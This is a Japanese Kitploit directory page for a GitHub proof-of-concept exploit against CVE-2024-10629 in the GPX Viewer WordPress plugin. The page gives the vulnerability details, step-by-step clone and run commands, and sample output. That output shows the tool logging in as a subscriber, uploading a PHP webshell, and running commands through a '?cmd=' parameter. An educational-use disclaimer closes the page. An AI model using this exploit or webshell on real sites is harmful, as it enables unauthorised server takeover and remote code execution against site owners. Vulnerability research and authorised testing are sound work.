Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/nxploited/cve-2024-10629
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubnxploited/cve-2024-10629

CVE-2024-10629

GPX Viewer <= 2.2.8 - 認証済み(購読者以上)任意ファイル作成

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🛠️ GPX Viewer エクスプロイト (CVE-2024-10629)

このリポジトリには、任意のファイル作成に対して脆弱な WordPress 用 GPX Viewer プラグインの概念実証エクスプロイトが含まれています (CVE-2024-10629)。この脆弱性により、購読者レベル以上のアクセス権を持つ認証済み攻撃者が、影響を受けるサイトのサーバー上に任意のファイルを作成でき、リモートコード実行につながる可能性があります。

📝 CVE 詳細

  • CVE ID: CVE-2024-10629
  • 公開日: 2024-11-13
  • 更新日: 2024-11-13
  • 影響を受けるプラグイン: GPX Viewer <= 2.2.8
  • 脆弱性の種類: 認証済み(購読者+)任意のファイル作成
  • スコア: 8.8 HIGH
  • 重大度: HIGH
  • バージョン: 3.1
  • ベクター文字列: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

説明

WordPress 用 GPX Viewer プラグインは、2.2.8 を含むすべてのバージョンにおいて、gpxv_file_upload() 関数の機能チェックとファイルタイプ検証の欠如により、任意のファイル作成に対して脆弱です。これにより、購読者レベル以上のアクセス権を持つ認証済み攻撃者が、影響を受けるサイトのサーバー上に任意のファイルを作成でき、リモートコード実行が可能になる可能性があります。

🚀 機能

  • 提供されたユーザー名とパスワードを使用した自動ログイン。
  • GPX Viewer プラグインのバージョン確認。
  • サーバーへの PHP シェルのアップロード。
  • シェルのアップロード成功の確認。
  • アップロードされたシェルを介したサーバー上でのコマンド実行。

📚 使用方法

前提条件

  • Python 3.x
  • requests ライブラリ

エクスプロイトの実行

  1. リポジトリをクローンします:

    root@kitploit:~
    git clone https://github.com/Nxploited/CVE-2024-10629/
    cd CVE-2024-10629
    
  2. 必要なライブラリをインストールします:

    root@kitploit:~
    pip install requests
    
  3. エクスプロイトを実行します:

    root@kitploit:~
    python exploit.py -u <target_url> -un <username> -p <password>
    

    <target_url>、<username>、<password> を適切な値に置き換えてください。

実行例

root@kitploit:~
python CVE-2024-10629.py -u http://example.com/wordpress -un subscriber -p subscriber_password

出力

  • スクリプトはプラグインのバージョンを出力し、脆弱かどうかを確認します。
  • 次に、提供された資格情報を使用してログインし、シェルのアップロードを試みます。
  • 成功した場合、シェルのアップロードを確認し、サンプルコマンド(ls)を実行します。
root@kitploit:~
[+] WordPress plugin version: 2.2.8
[+] Vulnerable version detected. Proceeding with exploitation...
[+] Logged in successfully.
[+] Shell uploaded. Checking shell...
[+] Shell uploaded successfully.
[+] Shell URL: http://example.com/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php
[+] Command output:
http://example.com/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php?cmd=ls
index.php
wp-admin
wp-content
wp-includes
...

コマンド例

  • ls = ファイルを表示
  • uname -a = システム情報を表示

⚠️ 免責事項

このエクスプロイトは、教育目的および許可されたテスト専用です。所有していない、またはテストする明示的な許可を得ていないシステムに対するこのエクスプロイトの不正使用は、違法かつ非倫理的です。このリポジトリの作成者および貢献者は、このエクスプロイトによって引き起こされた誤用や損害について責任を負いません。


著者: Khaled Alenazi (Nxploit)

ツールをダウンロード